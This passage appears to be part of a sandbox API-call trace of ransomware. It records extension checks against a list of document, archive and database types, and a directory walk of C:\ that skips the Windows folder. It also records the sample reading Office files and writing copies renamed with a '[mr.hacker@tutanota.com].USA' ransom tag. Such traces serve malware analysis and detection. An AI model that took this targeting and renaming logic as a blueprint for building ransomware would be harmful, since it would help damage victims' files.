Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.451] lstrlenW (lpString=".1cd") returned 4 [0274.452] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.452] lstrlenW (lpString=".jpg") returned 4 [0274.452] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.452] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0274.452] lstrlenW (lpString="IPDSINTL.DLL") returned 12 [0274.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.452] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=2270608) returned 1 [0274.452] CloseHandle (hObject=0x3b0) returned 1 [0274.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll")) returned 0x20 [0274.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0274.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.453] lstrlenW (lpString=".doc") returned 4 [0274.453] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString=".docx") returned 5 [0274.453] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.453] lstrlenW (lpString=".pdf") returned 4 [0274.453] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString=".xls") returned 4 [0274.453] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString=".xlsx") returned 5 [0274.453] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.453] lstrlenW (lpString=".ppt") returned 4 [0274.453] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.453] lstrlenW (lpString=".zip") returned 4 [0274.453] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString=".rar") returned 4 [0274.453] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.453] lstrlenW (lpString=".bz2") returned 4 [0274.453] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.453] lstrlenW (lpString=".7z") returned 3 [0274.453] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.453] lstrlenW (lpString=".dbf") returned 4 [0274.453] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.453] lstrlenW (lpString=".1cd") returned 4 [0274.453] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.454] lstrlenW (lpString=".jpg") returned 4 [0274.454] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.454] lstrlenW (lpString=".doc") returned 4 [0274.454] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString=".docx") returned 5 [0274.454] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.454] lstrlenW (lpString=".pdf") returned 4 [0274.454] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString=".xls") returned 4 [0274.454] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString=".xlsx") returned 5 [0274.454] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.454] lstrlenW (lpString=".ppt") returned 4 [0274.454] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.454] lstrlenW (lpString=".zip") returned 4 [0274.454] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString=".rar") returned 4 [0274.454] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.454] lstrlenW (lpString=".bz2") returned 4 [0274.454] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.454] lstrlenW (lpString=".7z") returned 3 [0274.454] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.454] lstrlenW (lpString=".dbf") returned 4 [0274.454] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.455] lstrlenW (lpString=".1cd") returned 4 [0274.455] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60 [0274.455] lstrlenW (lpString=".jpg") returned 4 [0274.455] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.455] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0274.455] lstrlenW (lpString="IPEDINTL.DLL") returned 12 [0274.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.455] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=883600) returned 1 [0274.455] CloseHandle (hObject=0x3b0) returned 1 [0274.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll")) returned 0x20 [0274.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.456] lstrlenW (lpString=".doc") returned 4 [0274.456] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString=".docx") returned 5 [0274.456] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.456] lstrlenW (lpString=".pdf") returned 4 [0274.456] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString=".xls") returned 4 [0274.456] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString=".xlsx") returned 5 [0274.456] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.456] lstrlenW (lpString=".ppt") returned 4 [0274.456] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.456] lstrlenW (lpString=".zip") returned 4 [0274.456] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString=".rar") returned 4 [0274.456] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.456] lstrlenW (lpString=".bz2") returned 4 [0274.456] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.456] lstrlenW (lpString=".7z") returned 3 [0274.456] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.456] lstrlenW (lpString=".dbf") returned 4 [0274.456] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.456] lstrlenW (lpString=".1cd") returned 4 [0274.456] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.457] lstrlenW (lpString=".jpg") returned 4 [0274.457] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.457] lstrlenW (lpString=".doc") returned 4 [0274.457] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString=".docx") returned 5 [0274.457] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.457] lstrlenW (lpString=".pdf") returned 4 [0274.457] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString=".xls") returned 4 [0274.457] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString=".xlsx") returned 5 [0274.457] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.457] lstrlenW (lpString=".ppt") returned 4 [0274.457] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.457] lstrlenW (lpString=".zip") returned 4 [0274.457] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString=".rar") returned 4 [0274.457] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.457] lstrlenW (lpString=".bz2") returned 4 [0274.457] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.457] lstrlenW (lpString=".7z") returned 3 [0274.457] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.457] lstrlenW (lpString=".dbf") returned 4 [0274.457] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.458] lstrlenW (lpString=".1cd") returned 4 [0274.458] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60 [0274.458] lstrlenW (lpString=".jpg") returned 4 [0274.458] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.458] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0274.458] lstrlenW (lpString="IPOLKINTL.DLL") returned 13 [0274.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.458] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=255920) returned 1 [0274.458] CloseHandle (hObject=0x3b0) returned 1 [0274.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll")) returned 0x20 [0274.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.459] lstrlenW (lpString=".doc") returned 4 [0274.459] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString=".docx") returned 5 [0274.459] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.459] lstrlenW (lpString=".pdf") returned 4 [0274.459] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString=".xls") returned 4 [0274.459] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString=".xlsx") returned 5 [0274.459] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.459] lstrlenW (lpString=".ppt") returned 4 [0274.459] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.459] lstrlenW (lpString=".zip") returned 4 [0274.459] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString=".rar") returned 4 [0274.459] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.459] lstrlenW (lpString=".bz2") returned 4 [0274.459] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.459] lstrlenW (lpString=".7z") returned 3 [0274.459] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.459] lstrlenW (lpString=".dbf") returned 4 [0274.459] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.459] lstrlenW (lpString=".1cd") returned 4 [0274.459] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.460] lstrlenW (lpString=".jpg") returned 4 [0274.460] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.460] lstrlenW (lpString=".doc") returned 4 [0274.460] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString=".docx") returned 5 [0274.460] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.460] lstrlenW (lpString=".pdf") returned 4 [0274.460] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString=".xls") returned 4 [0274.460] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString=".xlsx") returned 5 [0274.460] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.460] lstrlenW (lpString=".ppt") returned 4 [0274.460] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.460] lstrlenW (lpString=".zip") returned 4 [0274.460] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString=".rar") returned 4 [0274.460] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.460] lstrlenW (lpString=".bz2") returned 4 [0274.460] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.461] lstrlenW (lpString=".7z") returned 3 [0274.461] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.461] lstrlenW (lpString=".dbf") returned 4 [0274.461] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.461] lstrlenW (lpString=".1cd") returned 4 [0274.461] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61 [0274.461] lstrlenW (lpString=".jpg") returned 4 [0274.461] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.461] lstrcmpiW (lpString1=".gta", lpString2=".USA") returned -1 [0274.461] lstrlenW (lpString="Issue Tracking.gta") returned 18 [0274.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.461] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=249535) returned 1 [0274.461] CloseHandle (hObject=0x3b0) returned 1 [0274.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta")) returned 0x20 [0274.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.462] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.462] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.474] GetLastError () returned 0x0 [0274.474] ReadFile (in: hFile=0x3b0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x3cebf, lpOverlapped=0x0) returned 1 [0274.487] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x3cec0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x3cec0, lpOverlapped=0x0) returned 1 [0274.491] ReadFile (in: hFile=0x3b0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.491] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf8, lpOverlapped=0x0) returned 1 [0274.491] SetEndOfFile (hFile=0x394) returned 1 [0274.491] CloseHandle (hObject=0x394) Thread: id = 66 os_tid = 0x6a0 [0263.751] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x35a9308 [0263.751] lstrlenW (lpString="C:") returned 2 [0263.751] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3bcfd00 | out: lpFindFileData=0x3bcfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x59a948 [0263.751] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0263.751] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0263.751] lstrlenW (lpString="$Recycle.Bin") returned 12 [0263.751] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0263.751] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x4300048 [0263.752] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0263.752] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3bcfa84 | out: lpFindFileData=0x3bcfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59a988 [0263.752] FindNextFileW (in: hFindFile=0x59a988, lpFindFileData=0x3bcfa84 | out: lpFindFileData=0x3bcfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.752] FindNextFileW (in: hFindFile=0x59a988, lpFindFileData=0x3bcfa84 | out: lpFindFileData=0x3bcfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0263.752] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0263.752] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0263.752] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0263.752] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0263.752] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x4311058 [0263.752] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0263.752] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3bcf808 | out: lpFindFileData=0x3bcf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59a9c8 [0263.752] FindNextFileW (in: hFindFile=0x59a9c8, lpFindFileData=0x3bcf808 | out: lpFindFileData=0x3bcf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.752] FindNextFileW (in: hFindFile=0x59a9c8, lpFindFileData=0x3bcf808 | out: lpFindFileData=0x3bcf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd80b6bc0, 